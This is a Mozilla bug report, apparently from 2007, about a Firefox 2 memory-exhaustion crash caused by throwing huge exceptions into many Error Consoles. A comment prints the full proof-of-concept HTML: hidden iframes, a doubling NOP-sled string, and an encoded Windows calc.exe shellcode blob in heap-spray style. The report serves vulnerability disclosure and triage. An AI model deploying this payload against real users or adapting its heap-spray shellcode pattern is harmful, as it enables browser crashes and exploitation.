Firefox Memory Exhaustion DoS with multiple Error Consoles

RESOLVED DUPLICATE of bug 243170

Status

Product: Toolkit Graveyard
Component: Error Console
Priority: --
Severity: critical
Status: RESOLVED DUPLICATE of bug 243170
Opened: 10 years ago
Updated: 11 months ago

People

(Reporter: Eduardo Vela N, Unassigned)

Tracking

({crash})

Description

10 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5

While popping a lot of Error Consoles, when throwing very large exceptions through "throw 'string'", Firefox crashes.

Reproducible: Always

Steps to Reproduce:
1. Go to the PoC website; be aware that the PoC may crash your browser.

Actual Results:
After 2 minutes, "Memory Limit Reached" Error, and NULL Pointer Exception some seconds after that.

Expected Results:  
"out of memory" exception at the console.

I thought about marking this bug as critical, because "the software crashes and/or hangs", but I don't think it's really "critical", so I left it as a Major bug.

Comment 1

10 years ago
confirmed in 
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a7pre) Gecko/2007072905 Minefield/3.0a7pre
Status: UNCONFIRMED → NEW
Ever confirmed: true

Comment 2

10 years ago
And it crashes Internet Explorer too :-)

The content of that page is:

<html>
<head>
<title>Firefox [Error Console+Throw] Denial of Service (by sirdarckcat)</title>
<style>
iframe{height: 1px; width: 1px; border: 0px;}
</style>
</head>
<body>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<script language="JavaScript">
	var m=/*nop + nop*/unescape("%u9090");
	//shellcode never gets executed; this was just for testing. The shellcode is a simple >> calc.exe << PoC
	var s=/*shellcode*/unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
	for(var i=0;i<64;i++){
		m=m+m;
		document.write('<script>throw m+s;</scr'+'ipt>');
	}
</script>
</body>
</html>

Comment 3

10 years ago
We removed the ability for web sites to open the error console in bug 243170 on trunk only (for Firefox 3).

You're clearly hitting some kind of out-of-memory crash bug, but we have plenty of OOM crash bug reports, and this one is hard to reproduce even on branch, so I don't think it warrants special investigation.  If you can figure out what the OOM crash bug is by looking at a stack trace for the crash, please file another bug report (preferably with a patch).
Severity: major → critical
Status: NEW → RESOLVED
Last Resolved: 10 years ago
Keywords: crash
Resolution: --- → DUPLICATE
Duplicate of bug: 243170

Comment 4

Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a7pre) Gecko/2007072905 Minefield/3.0a7pre ID:2007072905

The URL makes my Firefox take a silly amount of memory and effectively hang too.

Comment 5

10 years ago
The script at the bottom looks like it's trying to fill up memory, so that's not too surprising.

Updated

9 years ago
Product: Firefox → Toolkit

Updated

11 months ago
Product: Toolkit → Toolkit Graveyard